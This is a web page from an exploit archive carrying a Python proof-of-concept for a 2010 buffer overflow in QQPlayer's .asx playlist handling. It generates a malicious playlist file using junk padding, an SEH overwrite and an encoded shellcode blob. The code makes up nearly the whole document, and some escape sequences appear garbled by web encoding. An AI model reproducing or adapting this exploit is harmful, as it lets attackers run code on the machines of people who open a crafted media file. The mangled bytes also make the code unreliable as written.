<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>QQPlayer asx File Processing Buffer Overflow Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
QQPlayer asx File Processing Buffer Overflow Exploit
====================================================

#################################################################
#
# Title: QQPlayer asx File Processing Buffer Overflow Exploit
# Author: Li Qingshan of Information Security Engineering Center,School of Software and Microelectronics,Peking University
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Test: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer&lt;=2.3.696.400p1
#
#################################################################
# Code :

head =”’&lt;ASX version=&quot;3.0&quot;&gt;
&lt;Entry&gt;
&lt;REF HREF=&quot;mms://site.com/ach/music/smpl/LACA-05928-002-tes_”’
junk = &quot;A&quot; * 1975
nseh =&quot;x42×61x21×61&quot;
seh =&quot;xa9×9ex41×00&quot;
adjust=&quot;x30×83xc0×0c&quot;
shellcode=(&quot;PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV&quot;
&quot;QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL&quot;
&quot;KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9&quot;
&quot;QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW&quot;
&quot;TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R&quot;
&quot;HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA&quot;)
junk_=&quot;R&quot;*8000
foot =”’_playlis.wma&quot;/&gt;
&lt;/Entry&gt;
&lt;/ASX&gt;”’
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot

fobj = open(&quot;poc.asx&quot;,&quot;w&quot;)
fobj.write(payload)
fobj.close()

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-21]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13423